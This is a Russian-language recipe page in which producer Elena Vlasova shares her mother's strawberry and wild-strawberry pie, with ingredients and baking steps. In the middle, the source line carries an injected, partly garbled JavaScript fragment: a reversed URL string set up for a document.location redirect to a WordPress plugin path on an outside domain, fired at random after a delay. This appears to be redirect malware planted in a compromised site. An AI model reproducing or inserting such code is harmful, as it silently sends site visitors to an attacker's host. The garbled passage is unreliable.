Пирог с ягодами: рецепт от Елены Власовой

Сооснователь «Спортивной секции» и продюсер бюро «Рабочее название» Елена Власова делится рецептом любимого маминого пирога, ради которого она готова даже лететь на завтрак в другой город.

Пирог с ягодами: рецепт от Елены Власовой. Изображение номер 1

Елена Власова

 

Елена Власова

сооснователь «Спортивной секции», продюсер Бюро «Рабочее название»

— Когда начинается сезон клубники и земляники, моя мама по выходным готовит самые вкусные на свете пироги, которые лучше всего запивать свежим деревенским молоком. Родители живут в другом городе, поэтому, к сожалению, мне не всегда удаётся попасть на семейные завтраки. Но однажды, узнав о новой партии этих пирогов, я через соцсети нашла человека, который как раз летел из Самары в Москву, и попросила захватить с собой ценнейший для меня груз. В благодарность за доставку я раскрыла секрет посылки и поделилась лакомым кусочком, после чего «почтальон» отметил, что если бы знал о содержимом посылки, то придумал бы, что она потерялась.

Мамины пироги с ягодами

Пирог с ягодами: рецепт от Елены Власовой. Изображение номер 2

Фото: whiteapronblog.com

Пирог с ягодами: рецепт от Елены Власовой

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

50 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

4—6 порций

КАЛОРИЙНОСТЬ:

300—350 кКал

300 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Мука

4 стакана

Ягоды (клубника, земляника)

по вкусу

Сливочное масло

180—200 г

Растительное масло

130 мл

Вода

70 мл

Сода

1 щепотка

Соль

1 щепотка

  1. Приготовьте песочное тесто. Для этого растопите 180—200 г сливочного масла, добавьте 4 стакана муки, щепотку соли и соды, ⅓ стакана воды, ⅔ стакана растительного масла. Хорошо перемешайте до однородной консистенции.
  2. Раскатайте тесто — можно сделать большие круги диаметром 30 см каждый, а можно маленькие порционные пироги. Затем добавьте начинку — свежую клубнику и землянику, присыпьте их небольшим количеством сухого киселя и сахара (или фруктозы) и запечатайте пирог, тщательно скручивая и слепляя края.
  3. При помощи вилки оставьте следы в тесте, чтобы начинка не вытекала, и, разогрев духовку до 180—200 градусов, отправьте в неё пироги на предварительно смазанном маслом противне на 30 минут.

ПАСТА С ЛОСОСЕМ: РЕЦЕПТ ОТ ЕКАТЕРИНЫ ЧУПАХИНОЙ

 

ВОСКРЕСНЫЙ БРАНЧ: РЕЦЕПТ ОТ АНАСТАСИИ ГОДУНОВОЙ

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector